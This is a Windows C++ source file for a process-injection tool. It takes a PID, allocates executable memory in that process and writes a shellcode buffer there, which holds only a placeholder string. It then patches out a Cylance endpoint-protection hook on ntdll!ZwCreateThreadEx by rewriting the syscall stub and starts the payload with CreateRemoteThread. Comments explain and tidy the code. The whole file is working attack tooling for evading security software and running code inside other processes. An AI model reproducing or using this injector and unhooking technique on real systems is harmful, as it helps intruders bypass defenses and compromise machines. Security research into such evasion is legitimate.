#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <iostream>

#include <windows.h>
// Payload that main() copies into the target process and starts on a remote
// thread. The string literal is only a placeholder, not executable shellcode;
// it has to be replaced with the real bytes. Note that sizeof(buf), which main()
// uses as the allocation and write length, includes the literal's terminating
// NUL, so one byte more than the payload is copied.
unsigned char buf[] =
"SHELLCODE_GOES_HERE";
// Declared but never referenced in this listing. Presumably intended as the
// element of a per-Windows-build table mapping an OS version to the syscall
// numbers passed to removeCylanceHook (which are hard-coded below instead) —
// TODO confirm with the author before relying on it.
struct syscall_table
{
    int osVersion;   // Windows version this entry would describe
};
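// Restore the native x64 syscall-stub preamble of dll!apiName in the CURRENT
// process, overwriting an inline hook that the Cylance userland DLL placed on
// that export.
//
// An unhooked Nt*/Zw* export on x64 starts with
//     4C 8B D1          mov r10, rcx
//     B8 xx xx xx xx    mov eax, <syscall number>
// This routine rewrites those first 8 bytes: the fixed 4-byte prefix, the
// caller-supplied low byte of the syscall number, and three zero bytes for the
// upper bytes of the immediate. (The earlier version wrote only 5 bytes, which
// left bytes 5-7 holding whatever the hook had put there; that was fine for a
// 5-byte jmp hook but not for anything longer.) Bytes 8 and beyond of the stub
// are NOT touched, so a hook longer than 8 bytes is still not fully undone.
//
//  dll      module name given to LoadLibraryA, e.g. "ntdll.dll"
//  apiName  export whose stub is restored, e.g. "ZwCreateThreadEx"
//  code     low byte of that export's syscall number; it differs between
//           Windows builds and must match the machine this runs on
// Returns true once the bytes have been written, false when the export could
// not be resolved or the page could not be made writable (nothing is written
// in that case). Callers that ignore the result behave as before.
bool removeCylanceHook(const char *dll, const char *apiName, char code) {
    DWORD old = 0, newOld = 0;

    // Resolve the export. GetProcAddress yields NULL both when the module
    // fails to load and when the name is unknown; without this check the
    // memcpy below would write to address 0 and crash.
    void *procAddress = GetProcAddress(LoadLibraryA(dll), apiName);
    if (procAddress == NULL) {
        printf("[!] Error: Could not resolve %s!%s\n", dll, apiName);
        return false;
    }

    // Preamble to write back: mov r10, rcx ; mov eax, imm32 (only the low
    // byte is caller-supplied, the other three are zero).
    unsigned char stub[8] = {
        0x4c, 0x8b, 0xd1,
        0xb8, (unsigned char)code, 0x00, 0x00, 0x00
    };

    printf("[*] Updating memory protection of %s!%s\n", dll, apiName);
    if (!VirtualProtect(procAddress, sizeof(stub), PAGE_EXECUTE_READWRITE, &old)) {
        // Code pages are normally execute-only; writing without the
        // protection change would fault, so stop here.
        printf("[!] Error: Could not change protection of %s!%s\n", dll, apiName);
        return false;
    }

    printf("[*] Unhooking Cylance\n");
    memcpy(procAddress, stub, sizeof(stub));

    // Put the original protection back. Failure here is reported but the
    // patch is already in place, hence still a success.
    // NOTE(review): MSDN suggests FlushInstructionCache after modifying code;
    // it is omitted here as in the original.
    if (!VirtualProtect(procAddress, sizeof(stub), old, &newOld)) {
        printf("[!] Warning: Could not restore protection of %s!%s\n", dll, apiName);
    }
    return true;
}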
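// Entry point: inject the bytes in `buf` into the process whose PID is
// argv[1] and run them on a new thread there.
//
// Order of operations: open the target with only the access rights the later
// calls need, allocate an RWX region in it, copy `buf` over, restore the
// ntdll!ZwCreateThreadEx stub in THIS process (the path CreateRemoteThread
// takes), then create the remote thread. Only that one export is unhooked;
// VirtualAllocEx and WriteProcessMemory run before it and go through whatever
// hooks, if any, sit on their own ntdll entry points.
//
// Exit status: 0 on success, 1 when a Win32 call fails, 2 on bad usage.
int main(int argc, char **argv)
{
    if (argc != 2) {
        printf("Usage: %s PID\n", argv[0]);
        return 2;
    }

    // strtoul rather than atoi so that "", "abc" or trailing junk is rejected
    // instead of silently becoming PID 0.
    char *end = NULL;
    unsigned long pid = strtoul(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || pid == 0) {
        printf("[!] Error: '%s' is not a valid PID\n", argv[1]);
        return 2;
    }
    DWORD processID = (DWORD)pid;

    // Least privilege: these are the rights VirtualAllocEx, WriteProcessMemory
    // and CreateRemoteThread document as required. PROCESS_ALL_ACCESS was more
    // than this program uses.
    HANDLE proc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                              PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                              false, processID);
    // OpenProcess signals failure with NULL, not INVALID_HANDLE_VALUE, so the
    // previous comparison never fired and a failed open fell through.
    if (proc == NULL) {
        printf("[!] Error: Could not open target process: %lu (error %lu)\n",
               (unsigned long)processID, (unsigned long)GetLastError());
        return 1;
    }
    printf("[*] Opened target process %lu\n", (unsigned long)processID);

    // The region is writable AND executable. A W^X split (allocate RW, write,
    // then VirtualProtectEx to RX) would avoid that mapping but is not done here.
    // sizeof(buf) includes the string literal's terminating NUL.
    printf("[*] Allocating memory in target process with VirtualAllocEx\n");
    void *alloc = VirtualAllocEx(proc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (alloc == NULL) {
        printf("[!] Error: Could not allocate memory in target process\n");
        CloseHandle(proc);
        return 1;
    }
    printf("[*] Allocated %zu bytes at memory address %p\n", sizeof(buf), alloc);

    printf("[*] Attempting to write into victim process using WriteProcessMemory\n");
    if (WriteProcessMemory(proc, alloc, buf, sizeof(buf), NULL) == 0) {
        printf("[!] Error: Could not write to target process memory\n");
        CloseHandle(proc);
        return 1;
    }
    printf("[*] WriteProcessMemory successful\n");

    // Restore ntdll!ZwCreateThreadEx before the thread-creation call below.
    // 0xBB is the low byte of the syscall number for ONE particular Windows
    // build; the number changes between versions and has to match the target
    // machine. A wrong value makes the restored stub issue a different syscall.
    removeCylanceHook("ntdll.dll", "ZwCreateThreadEx", 0xBB);

    printf("[*] Attempting to spawn shellcode using CreateRemoteThread\n");
    HANDLE createRemote = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL);
    // The original printed "Success" unconditionally; a NULL handle means the
    // thread was never created.
    if (createRemote == NULL) {
        printf("[!] Error: CreateRemoteThread failed (error %lu)\n",
               (unsigned long)GetLastError());
        CloseHandle(proc);
        return 1;
    }
    printf("[*] Success :D\n");

    // The remote thread keeps running in the target; only our handles go away.
    CloseHandle(createRemote);
    CloseHandle(proc);
    return 0;
}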